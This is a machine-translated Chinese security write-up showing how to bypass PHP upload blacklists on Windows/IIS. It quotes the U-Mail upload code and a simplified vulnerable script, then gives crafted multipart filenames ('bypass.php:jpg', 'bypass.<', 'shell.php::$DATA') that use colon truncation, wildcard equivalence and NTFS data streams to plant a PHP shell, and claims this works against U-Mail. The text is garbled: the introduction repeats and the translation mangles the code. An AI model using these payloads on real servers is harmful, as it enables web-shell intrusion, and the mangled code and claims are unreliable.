Pkav: common windows upload defects in php

$ Pkav-publish {when php scrubbed windows} Jianxin @ xsser abandoned me, but I cannot abandon the dark clouds .. php makes windows easy. It is like a man who encounters a woman. problems may occur sooner or later .. thanks to @ gainoverTips: This article describes a new file upload method (vulnerability caused by several features) and provides corresponding examples .. detailed Description: #1 instance

$ Pkav-publish {when php scrubbed windows} Jianxin @ xsser abandoned me, but I cannot abandon the dark clouds .. php makes windows easy. It is like a man who encounters a woman. problems may occur sooner or later .. thanks to @ gainover Tips: This article describes a new file upload method (vulnerability caused by several features) and provides corresponding examples .. detailed Description: #1 instance

$ Pkav-> publish {when php falls into windows}
Jianxin @ xsser abandoned me, but I cannot abandon the dark clouds ..
Php makes windows easy. It is like a man who encounters a woman. problems may occur sooner or later ..
Thanks to @ gainover
Tips: This article describes a new file upload method (vulnerabilities caused by several features) and provides corresponding examples ..

Detailed description:

#1 instance Introduction

The example used in this case is: U-Mail system.

The code of the place where U-Mail system files are uploaded is as follows:

Code Region

   If (ACTION = "attach-upload "){
If ($ _ FILES ){
$ File_name = $ _ FILES ['filedata'] ['name'];
$ File_type = $ _ FILES ['filedata'] ['type'];
$ File_size = $ _ FILES ['filedata'] ['SIZE'];
$ File_source = $ _ FILES ['filedata'] ['tmp _ name'];
$ File_suffix = getfilenamesuffix ($ file_name );
$ Not_allow_ext = array ("php", "phps", "php3", "exe", "bat ");
If (in_array ($ file_suffix, $ not_allow_ext )){
Dump_json (array ("status" => 0, "message" => el ("file upload with this extension not supported ","")));
}
$ Path_target = getusercachepath ();
Do {
$ File_id = makerandomname ();
$ File_target = $ path_target. $ file_id. ".". $ file_suffix;
} While (file_exists ($ file_target ));
If (move_uploaded_file ($ file_source, $ file_target )){
Dump_json (array ("status" => 0, "message" => el ("An error occurred while writing files. Please contact the administrator! ","")));
}
$ _ SESSION [SESSION_ID] ['Attach _ cache'] [] = array ("id" => $ file_id, "name" => $ file_name, "type" => "1", "path" => $ file_target, "size" => $ file_size );
Dump_json (array ("status" => "1", "filename" => $ file_name, "filesize" => $ file_size, "file_id" => $ file_id ));
} Else {
Dump_json (array ("status" => "0", "message" => el ("the file to be uploaded cannot be found! ","")));
}
}

We noticed the following code:

Code Region

$ Not_allow_ext = array ("php", "phps", "php3", "exe", "bat ");
If (in_array ($ file_suffix, $ not_allow_ext )){
Dump_json (array ("status" => 0, "message" => el ("file upload with this extension not supported ","")));
}

Obviously, blacklist verification is used, although we can use file suffixes like this to bypass program detection, such as bypass. phpX (here X represents space % 20 or other special characters {% 80-% 99}), but this is not what I want to talk about today.

Today, I will use this example to explain a new file upload method ..

#2 code poc implementation

To facilitate local testing, we simplify the above Code as follows:

Code Region

   //U-Mail demo ...
if(isset($_POST['submit'])){
$filename = $_POST['filename'];
$filename = preg_replace("/[^\w]/i", "", $filename);
$upfile = $_FILES['file']['name'];
        $upfile = str_replace(';',"",$upfile);
$upfile = preg_replace("/[^(\w|\:|\$|\.|\<|\>)]/i", "", $upfile);
$tempfile = $_FILES['file']['tmp_name'];

$ext = trim(get_extension($upfile)); // null

if(in_array($ext,array('php','php3','php5'))){
die('Warning ! File type error..');
}

if($ext == 'asp' or $ext == 'asa' or $ext == 'cer' or $ext == 'cdx' or $ext == 'aspx' or $ext == 'htaccess') $ext = 'file';

        //$savefile = 'upload/'.$upfile;
$savefile = 'upload/'.$filename.".".$ext;

if(move_uploaded_file($tempfile,$savefile)){
die('Success upload..path :'.$savefile);
}else{
die('Upload failed..');
}
}
function get_extension($file){
return strtolower(substr($file, strrpos($file, '.')+1));
}
?>

 
  
 

For the above Code, although the file name is detected through the blacklist, but through the currently known upload method, there is no way to successfully upload the PHP file (regardless of the program Bug ), therefore, the code uploaded to this file is "secure,

However, I suddenly looked back. in that dark place, when php encounters Windows, the beautiful love story is generated ..

#3 tell stories in detail

One day, the second brother lost a url Connection in the group. I simply read about the usage of system features for file upload. The interest is coming soon and I will study it carefully, so with this article ..

In php + window + iis:

Double quotation marks (">") <=> dot (".")';

Greater than the symbol (">") <=> question mark ("? ")';

Less than the symbol ("<") <=> asterisk ("*")';

If there is such a fun thing, You can do too much? But this is not the case. Through a series of tests, we found that this feature can only be used to overwrite known files during file upload, so this feature is a little tricky ..

There are two reasons:

1) the directories for uploading files are generally uncontrollable;

2) at the same time, the directories uploaded to files cannot have any PHP files we want, so they cannot be overwritten;

Later, after repeated reflection, I finally found a perfect solution ..

The idea is as follows:

First, we use a special method to generate a PHP file, and then use this feature to overwrite the file ..

But the problem arises again. How can I generate a PHP file? If you can directly generate a PHP file, what features do you need to use?

Don't worry, there is always a way ..

We all know that when uploading a file, we often consider file name truncation, such as % 00 ..

Yes! Some may also use colons (":") to truncate, such as bypass. php: jpg.

But do you know? The file generated by the colon truncation is blank, and there is no content in it. Why do you understand it here? Although no content exists in the generated PHP file, the PHP file is always generated, so we can use the features mentioned above to make perfect use of them ..

#4 the colon + feature is successfully used

Follow the ideas provided by #3 to implement the SDK ..

Local test address: http://www.secmap.cn/upfile.php environment: Windows + IIS7.5

1) First, use the colon to generate the php file to be overwritten. Here: bypass. php,

Click forward to view the bypass. php file that is successfully generated.

2) overwrite the file using the above system features

From the above, we already know that "<" is equal to "*", and "*" any character in the code ..

You can modify the file name as follows:

Code Region

------ Webkitformboundaryaarrn2lbvpvc wk
Content-Disposition: form-data; name = "file"; filename = "bypass. <"
Content-Type: image/jpeg
// Note! File Name: bypass. <

Click go... to overwrite the bypass. php file,

Comparing the two figures above, bypass. php is successfully written into the content ..

#5 Feature 2

First, let's take a look at the paragraph above Microsoft MSDN,

Note the English characters circled in red

Code Region

The default data stream has no name. That is, the fully qualified name for the default stream for a file called "sample.txt" is "sample.txt::$DATA" since "sample.txt" is the name of the file and "$DATA" is the stream type.

It's not good. Try it ..

Similarly, we can modify the uploaded file name as follows:

Code Region

------ Webkitformboundaryaarrn2lbvpvc wk
Content-Disposition: form-data; name = "file"; filename = 'datastreamtest. php: $ data'
Content-Type: image/jpeg
// Note! File Name: DataStreamTest. php: $ DATA

Click GO, and a miracle appears ..

Access...

Proof of vulnerability:

#6 Vulnerability proof

The usage of U-Mail is the same as that of the preceding method. For simplicity and convenience, you can directly capture packets and change the file name:

Shell. php: $ DATA can be uploaded successfully. It is not demonstrated here, with shell